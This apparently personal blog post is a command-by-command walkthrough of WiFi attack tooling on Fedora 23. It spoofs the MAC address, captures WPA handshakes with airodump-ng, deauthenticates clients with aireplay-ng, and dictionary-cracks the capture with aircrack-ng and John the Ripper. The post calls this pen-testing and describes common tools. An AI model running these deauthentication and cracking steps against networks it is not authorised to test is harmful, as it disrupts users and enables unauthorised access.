Saturday, 6 February 2016

Fedora 23 / Aircrack on HP Mini 210 3025sa

Working with airmon-ng on Fedora 23 running on HP Mini 210 3025sa with an Atheros AR9285 wifi card using stock kernel ath9k module.

Firstly we need to stop all services that may interfere with the wireless interface - we can let airmon tell us what it thinks might be troublesome and then stop these. Letting airmon stop them (via airmon-ng kill) does not prevent other tools/monitors from restarting these processes. To start, disconnect from all wireless networks.
$ airmon-ng check
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
769 NetworkManager
779 avahi-daemon
785 avahi-daemon
891 wpa_supplicant

$ service avahi-daemon stop
$ service NetworkManager stop
$ service wpa_supplicant stop
Verify that the interface is down (there's no 'UP' flag)
$ ifconfig wlo1 down && ifconfig -a
...
wlo1: flags=802 mtu 1500
At this point the wireless card is down and disconnected and we will need to put the card into monitor mode. To manually do this: $ iwconfig wlo1 mode monitor will leave you the same interface in the desired mode. To let airmon-ng handle this:
$ airmon-ng start wlo1
PHY Interface Driver Chipset

phy0 wlo1 ath9k Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlo1 on [phy0]wlo1mon)
(mac80211 station mode vif disabled for [phy0]wlo1)

# verify monitor mode and also the interface name change
$ iwconfig
...
wlo1mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=15 dBm
$ ifconfig -a
...
wlo1mon: flags=4163 mtu 1500

$ ifconfig wlo1mon down
$ macchanger -r wlo1mon
$ ifconfig wlo1mon up
At this stage we can use this newly created logical wlo1mon interface
# see what is around, only connected clients
$ airodump-ng -a wlo1mon

# see only on specific bssid/essid on given channel as found from above
# writing out the capture details in /tmp/wifi.cap
$ airodump-ng -d bssid -c channel wlo1mon -w /tmp/wifi

# deauth
$ aireplay-ng --deauth 1 -a
bssid -c client mac

# attempt to pen-test the handshake (if logged) using the dictionary file -w
# if the capture file contains more than one bssid, use -b to specify for non
# interactive use
$ aircrack-ng /tmp/wifi.cap -w /usr/share/dict/darkc0de
For long running/resumable penetration testing, John The Ripper can be used in conjunction with aircrack-ng.
# setup john the ripper help pentest but using session
$ john --session=foo --stdout --wordlist=/usr/share/dict/darkc0de | \
aircrack-ng -w - \
-b 00:11:22:33:44:55 /tmp/wifi.cap


# use 'q' or Ctrl-C to pause cracking

# restart cracking
$ john --restore=foo | \
aircrack-ng -w - \
-b 00:11:22:33:44:55 /tmp/wifi.cap


To clean up the logical interfaces created and return the wireless interface for normal use:
$ airmon-ng stop wlo1
$ for i in wpa_supplicant avahi-daemon NetworkManager; do service $i start ; done
At this point bring back the connection in the NetworkManager and go about your day.

No comments:

Post a Comment